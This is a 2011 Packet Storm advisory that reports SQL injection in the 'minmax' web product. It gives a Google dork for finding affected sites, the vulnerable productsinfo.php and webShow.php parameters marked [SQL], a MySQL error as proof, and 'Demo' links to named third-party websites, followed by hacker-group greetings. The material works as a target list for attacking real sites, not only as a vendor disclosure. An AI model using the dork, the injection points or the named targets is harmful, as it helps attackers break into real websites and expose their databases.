Minmax SQL Injection

2011-09-14T00:00:00
ID PACKETSTORM:105082
Type packetstorm
Reporter nGa Sa Lu
Modified 2011-09-14T00:00:00

Description

                                        
                                            `# Exploit Title: minmax SQL INJECTION Vulnerabilities   
# Date: 14/09/2011   
# Author: nGa Sa Lu [ N-S-L ]   
# Service Link: http://minmax.biz   
# Tested on: Vista   
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # #   
  
# Google Dork: intext:"Design by MINMAX."  
  
# www.site.com/productsinfo.php?ID=[SQL]  
  
# SQL Error Statement  
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' Order by UpdateTime Desc' at line 5  
  
# Demo:  
http://minmax.biz/webShow.php?type=[SQL]  
http://www.mightyjaw.com/productsinfo.php?KindID=2&ID=[SQL]  
http://www.purefishing.com.tw/productsinfo.php?BrandID=5&TypeID=2&CateID=3&ID=[SQL]  
  
1xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx0  
0xxxxx(Greetz t0 all M1RT crew, Shadow008 and hackall [dot] net members), alb0r44q [dot] com xxxxxxxxxxxxxxxxxx1  
1xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx0  
`